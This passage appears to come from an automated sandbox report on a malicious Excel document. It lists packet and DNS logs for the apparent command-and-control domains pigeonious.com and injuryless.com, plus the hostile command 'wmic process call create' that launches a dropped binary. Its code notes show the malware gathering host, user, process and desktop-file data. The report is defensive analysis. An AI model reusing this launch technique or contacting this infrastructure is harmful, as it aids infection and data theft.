Jun 10, 2021 19:29:44.075694084 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075712919 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075735092 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075748920 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075774908 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075788021 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075814009 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075829983 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075855970 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:29:44.075870991 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:44.075967073 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:29:46.368170977 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.418391943 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.418498039 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.434535980 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.486846924 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.486905098 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.486943960 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.486980915 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.486993074 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.487015963 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.487016916 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.487032890 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.487052917 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.487073898 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.487123013 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.593111992 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.643872023 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.644037008 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.659388065 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.659432888 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.709692001 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.709731102 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.709757090 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.765893936 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.766060114 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.775768042 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:29:46.865333080 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.873976946 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:29:46.874161005 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:30:16.880769968 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:30:16.931003094 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:30:17.006535053 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:30:17.006614923 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:30:47.013425112 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:30:47.063528061 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:30:47.115776062 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:30:47.115869999 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:30:48.973177910 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:30:48.973225117 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:30:48.973376036 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:31:17.120002985 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:31:17.170173883 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:31:17.223309040 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:31:17.223433018 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:31:29.567676067 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:31:29.568412066 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:31:29.646042109 CEST	443	49724	95.142.44.93	192.168.2.3
Jun 10, 2021 19:31:29.646158934 CEST	49724	443	192.168.2.3	95.142.44.93
Jun 10, 2021 19:31:47.228717089 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:31:47.279499054 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:31:47.329003096 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:31:47.329371929 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:32:17.341650963 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:32:17.391849995 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:32:17.452378035 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:32:17.452636003 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:32:47.498162985 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:32:47.548512936 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:32:47.599358082 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:32:47.599453926 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:33:17.608819008 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:33:17.658754110 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:33:17.709719896 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:33:17.709846020 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:33:47.716193914 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:33:47.766365051 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:33:47.818126917 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:33:47.818236113 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:34:17.824675083 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:34:17.874931097 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:34:17.929522991 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:34:17.929613113 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:34:47.934438944 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:34:47.985028028 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:34:48.036968946 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:34:48.037414074 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:35:18.043512106 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:35:18.093683958 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:35:18.171160936 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:35:18.171591997 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:35:48.178474903 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:35:48.229072094 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:35:48.280929089 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:35:48.281250954 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:36:18.287578106 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:36:18.337944031 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:36:18.389144897 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:36:18.389226913 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:36:48.395252943 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:36:48.445736885 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:36:48.497499943 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:36:48.497936964 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:37:18.505686045 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:37:18.555797100 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:37:18.617820024 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:37:18.618138075 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:37:48.624120951 CEST	49727	443	192.168.2.3	193.178.169.243
Jun 10, 2021 19:37:48.674165010 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:37:48.727148056 CEST	443	49727	193.178.169.243	192.168.2.3
Jun 10, 2021 19:37:48.727246046 CEST	49727	443	192.168.2.3	193.178.169.243

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 10, 2021 19:29:26.869281054 CEST	64185	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:26.919629097 CEST	53	64185	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:27.712269068 CEST	65110	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:27.767049074 CEST	53	65110	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:30.299875021 CEST	58361	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:30.350756884 CEST	53	58361	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:31.149571896 CEST	63492	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:31.202770948 CEST	53	63492	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:31.946738005 CEST	60831	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:31.999885082 CEST	53	60831	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:32.823888063 CEST	60100	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:32.877093077 CEST	53	60100	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:35.992733955 CEST	53195	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:36.043184996 CEST	53	53195	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:38.526139975 CEST	50141	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:38.576669931 CEST	53	50141	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:39.581397057 CEST	53023	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:39.675406933 CEST	53	53023	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:40.068955898 CEST	49563	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:40.119657993 CEST	53	49563	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:40.349926949 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:40.421042919 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:41.355870008 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:41.429215908 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:42.421807051 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:42.480777979 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:43.004868031 CEST	59349	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:43.055016994 CEST	53	59349	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:43.196017981 CEST	57084	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:43.256313086 CEST	53	57084	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:44.098253012 CEST	58823	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:44.148494005 CEST	53	58823	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:44.418675900 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:44.477164030 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:45.140666962 CEST	57568	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:45.190901995 CEST	53	57568	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:46.281454086 CEST	50540	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:46.301975012 CEST	54366	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:46.346998930 CEST	53	50540	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:46.363143921 CEST	53	54366	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:47.237745047 CEST	53034	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:47.299107075 CEST	53	53034	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:48.465703011 CEST	51352	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:48.524168968 CEST	53	51352	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:49.064505100 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:49.116206884 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:51.561351061 CEST	57762	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:51.613240957 CEST	53	57762	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:52.787976980 CEST	55435	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:52.838251114 CEST	53	55435	8.8.8.8	192.168.2.3
Jun 10, 2021 19:29:53.757215023 CEST	50713	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:29:53.807754040 CEST	53	50713	8.8.8.8	192.168.2.3
Jun 10, 2021 19:30:04.632174969 CEST	56132	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:30:04.693382978 CEST	53	56132	8.8.8.8	192.168.2.3
Jun 10, 2021 19:30:23.215066910 CEST	58987	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:30:23.276669979 CEST	53	58987	8.8.8.8	192.168.2.3
Jun 10, 2021 19:30:55.990628958 CEST	56579	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:30:56.051986933 CEST	53	56579	8.8.8.8	192.168.2.3
Jun 10, 2021 19:30:56.819478989 CEST	60633	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:30:56.886271000 CEST	53	60633	8.8.8.8	192.168.2.3
Jun 10, 2021 19:31:12.039289951 CEST	61292	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:31:12.111557961 CEST	53	61292	8.8.8.8	192.168.2.3
Jun 10, 2021 19:31:25.904824018 CEST	63619	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:31:25.966299057 CEST	53	63619	8.8.8.8	192.168.2.3
Jun 10, 2021 19:31:32.244328022 CEST	64938	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:31:32.305917025 CEST	53	64938	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:02.641453028 CEST	61946	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:02.709626913 CEST	53	61946	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:04.067090988 CEST	64910	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:04.145922899 CEST	53	64910	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:22.280401945 CEST	52123	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:22.575020075 CEST	53	52123	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:24.563946009 CEST	56130	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:24.622960091 CEST	53	56130	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:25.961316109 CEST	56338	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:26.097450018 CEST	53	56338	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:26.903242111 CEST	59420	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:26.965243101 CEST	53	59420	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:27.928541899 CEST	58784	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:27.978883028 CEST	53	58784	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:28.978029966 CEST	63978	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:29.038048029 CEST	53	63978	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:31.757529974 CEST	62938	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:31.817420959 CEST	53	62938	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:33.720979929 CEST	55708	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:33.779915094 CEST	53	55708	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:35.097579002 CEST	56803	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:35.157727003 CEST	53	56803	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:35.949721098 CEST	57145	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:36.010384083 CEST	53	57145	8.8.8.8	192.168.2.3
Jun 10, 2021 19:32:40.719794989 CEST	55359	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:32:40.779256105 CEST	53	55359	8.8.8.8	192.168.2.3
Jun 10, 2021 19:34:21.674874067 CEST	58306	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:34:21.744677067 CEST	53	58306	8.8.8.8	192.168.2.3
Jun 10, 2021 19:34:22.191497087 CEST	64124	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:34:22.265377045 CEST	53	64124	8.8.8.8	192.168.2.3
Jun 10, 2021 19:34:25.343003988 CEST	49361	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:34:25.412002087 CEST	53	49361	8.8.8.8	192.168.2.3
Jun 10, 2021 19:34:29.503706932 CEST	63150	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:34:29.564973116 CEST	53	63150	8.8.8.8	192.168.2.3
Jun 10, 2021 19:34:29.899662018 CEST	53279	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:34:29.963212013 CEST	53	53279	8.8.8.8	192.168.2.3
Jun 10, 2021 19:37:29.134620905 CEST	56881	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:37:29.206645966 CEST	53	56881	8.8.8.8	192.168.2.3
Jun 10, 2021 19:37:32.832544088 CEST	53642	53	192.168.2.3	8.8.8.8
Jun 10, 2021 19:37:32.912306070 CEST	53	53642	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jun 10, 2021 19:29:51.613358021 CEST	192.168.2.3	8.8.8.8	d077	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 10, 2021 19:29:43.196017981 CEST	192.168.2.3	8.8.8.8	0x8251	Standard query (0)	pigeonious.com	A (IP address)	IN (0x0001)
Jun 10, 2021 19:29:46.281454086 CEST	192.168.2.3	8.8.8.8	0x8f87	Standard query (0)	injuryless.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 10, 2021 19:29:43.256313086 CEST	8.8.8.8	192.168.2.3	0x8251	No error (0)	pigeonious.com		95.142.44.93	A (IP address)	IN (0x0001)
Jun 10, 2021 19:29:46.346998930 CEST	8.8.8.8	192.168.2.3	0x8f87	No error (0)	injuryless.com		193.178.169.243	A (IP address)	IN (0x0001)
Jun 10, 2021 19:30:56.051986933 CEST	8.8.8.8	192.168.2.3	0x5e57	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jun 10, 2021 19:34:21.744677067 CEST	8.8.8.8	192.168.2.3	0xdb4b	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jun 10, 2021 19:29:43.417321920 CEST	95.142.44.93	443	192.168.2.3	49724	CN=pigeonious.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Tue Jun 08 15:19:13 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Mon Sep 06 15:19:13 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024
Jun 10, 2021 19:29:46.487052917 CEST	193.178.169.243	443	192.168.2.3	49727	CN=injuryless.com CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=R3, O=Let's Encrypt, C=US CN=ISRG Root X1, O=Internet Security Research Group, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu May 27 15:42:29 CEST 2021 Fri Sep 04 02:00:00 CEST 2020 Wed Jan 20 20:14:03 CET 2021	Wed Aug 25 15:42:29 CEST 2021 Mon Sep 15 18:00:00 CEST 2025 Mon Sep 30 20:14:03 CEST 2024	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=R3, O=Let's Encrypt, C=US	CN=ISRG Root X1, O=Internet Security Research Group, C=US	Fri Sep 04 02:00:00 CEST 2020	Mon Sep 15 18:00:00 CEST 2025
					CN=ISRG Root X1, O=Internet Security Research Group, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Jan 20 20:14:03 CET 2021	Mon Sep 30 20:14:03 CEST 2024

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 6564 Parent PID: 792

General

Start time:	19:29:37
Start date:	10/06/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Imagebase:	0x12e0000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WMIC.exe PID: 6852 Parent PID: 6564

General

Start time:	19:29:43
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process call create 'C:/Users/Public/SettingSyncHost'
Imagebase:	0x13c0000
File size:	391680 bytes
MD5 hash:	79A01FCD1C8166C5642F37D1E0FB7BA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: conhost.exe PID: 6860 Parent PID: 6852

General

Start time:	19:29:43
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: SettingSyncHost PID: 7044 Parent PID: 4940

General

Start time:	19:29:44
Start date:	10/06/2021
Path:	C:\Users\Public\SettingSyncHost
Wow64 process (32bit):	true
Commandline:	C:/Users/Public/SettingSyncHost
Imagebase:	0xf90000
File size:	511488 bytes
MD5 hash:	526D56017EF5105277FE0D366C95C39D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: SettingSyncHost PID: 7044 Parent PID: 4940 SettingSyncHostCOMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	68.8%
Signature Coverage:	34.1%
Total number of Nodes:	504
Total number of Limit Nodes:	11

Executed Functions

Function 00FCBF90, Relevance: 40.9, APIs: 3, Strings: 20, Instructions: 691
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FCD2F0: gethostname.WS2_32(?,00000100), ref: 00FCD32F

SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,?,?,A87AA355), ref: 00FCC03F
GetUserNameA.ADVAPI32(?,?), ref: 00FCC136
GetComputerNameExA.KERNELBASE(00000002,?,?,?,?), ref: 00FCC19A

Strings

"pc_domain":"", , xrefs: 00FCC6AE
"pc_dns_host_name":"", , xrefs: 00FCC6BE
"part_of_domain":", xrefs: 00FCC68C
", , xrefs: 00FCC27D, 00FCC2BA, 00FCC2FA, 00FCC38A, 00FCC485, 00FCC5A6, 00FCC6A2
"adinfo": {, xrefs: 00FCC4FC
"file": ", xrefs: 00FCC45D
"domain": ", xrefs: 00FCC289
"processes": [, xrefs: 00FCC306
] ,, xrefs: 00FCC3ED, 00FCC4EC
"pid": ", xrefs: 00FCC396
"desktop_file_list": [, xrefs: 00FCC3FD
"size": ", xrefs: 00FCC491
yes, xrefs: 00FCC687
"pc_model":"", xrefs: 00FCC6CE
"user":", xrefs: 00FCC2C6
"name": ", xrefs: 00FCC362
no_ad, xrefs: 00FCC536
"adinformation":", xrefs: 00FCC579
WORKGROUP, xrefs: 00FCC200
"host":", xrefs: 00FCC24C

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000004.00000002.1300725591.0000000000F90000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300746726.0000000000F91000.00000020.00020000.sdmp Download File
Associated: 00000004.00000002.1300850176.0000000000FBB000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300877417.0000000000FC5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.1300893530.0000000000FC7000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.1301073357.00000000010EE000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301085124.00000000010F0000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.1301106256.00000000010F1000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_f90000_SettingSyncHost.jbxd

Similarity

API ID: Name$ComputerFolderPathUsergethostname
String ID: ", $"adinfo": {$"adinformation":"$"desktop_file_list": [$"domain": "$"file": "$"host":"$"name": "$"part_of_domain":"$"pc_dns_host_name":"", $"pc_domain":"", $"pc_model":""$"pid": "$"processes": [$"size": "$"user":"$WORKGROUP$] ,$no_ad$yes
API String ID: 1741200219-1158698074
Opcode ID: 0a6218ef2949a58a5ea0b9a3db3c795d4eae6890207dcff3b62a6d119df0eed0
Instruction ID: 3bda04772fbc7cb8b92b7940fc583d7ebaf7a9504d9fdc3fc0ec700c802c8bd0
Opcode Fuzzy Hash: 0a6218ef2949a58a5ea0b9a3db3c795d4eae6890207dcff3b62a6d119df0eed0
Instruction Fuzzy Hash: D152C13190021A8BDB2AEB24CD5ABADB776AF45300F1481DDE04DAB782DB755F85DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00FCCEB0, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNELBASE(?,?,?,?,?,?,0100466C,00000002,A87AA355,?,?), ref: 00FCCF78
FindNextFileA.KERNELBASE(00000000,?), ref: 00FCCF9D
FindNextFileA.KERNELBASE(?,?,00000000,?,?,?,?), ref: 00FCD238
FindClose.KERNELBASE(00000000), ref: 00FCD249

Strings

0, xrefs: 00FCD1A5

Memory Dump Source

Source File: 00000004.00000002.1300907437.0000000000FC8000.00000040.00020000.sdmp, Offset: 00F90000, based on PE: true

